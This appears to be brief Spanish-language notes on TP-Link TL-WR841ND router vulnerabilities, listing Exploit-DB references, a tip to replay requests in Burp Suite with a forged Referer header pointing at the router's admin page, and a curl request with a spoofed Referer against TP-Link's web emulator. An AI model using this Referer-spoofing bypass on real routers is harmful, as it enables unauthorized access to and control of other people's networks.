Se puede acceder a toda la configuración y ejecutar cualquier comando remotamente.
https://www.exploit-db.com/exploits/45064 https://www.exploit-db.com/exploits/45168 https://www.exploit-db.com/exploits/45203 https://www.exploit-db.com/exploits/46882
Usando burp-suite podés repetir la consulta agregandole 'Referer: http://192.168.0.1/mainFrame.htm'
https://www.exploit-db.com/exploits/44781
https://emulator.tp-link.com/TL-WR841ND_V8/Index.htm
curl 'https://emulator.tp-link.com/TL-WR841ND_V8/userRpm/VirtualServerRpm.htm' \
-H 'Referer: https://emulator.tp-link.com/TL-WR841ND_V8/userRpm/MenuRpm.htm' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
-H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "Linux"'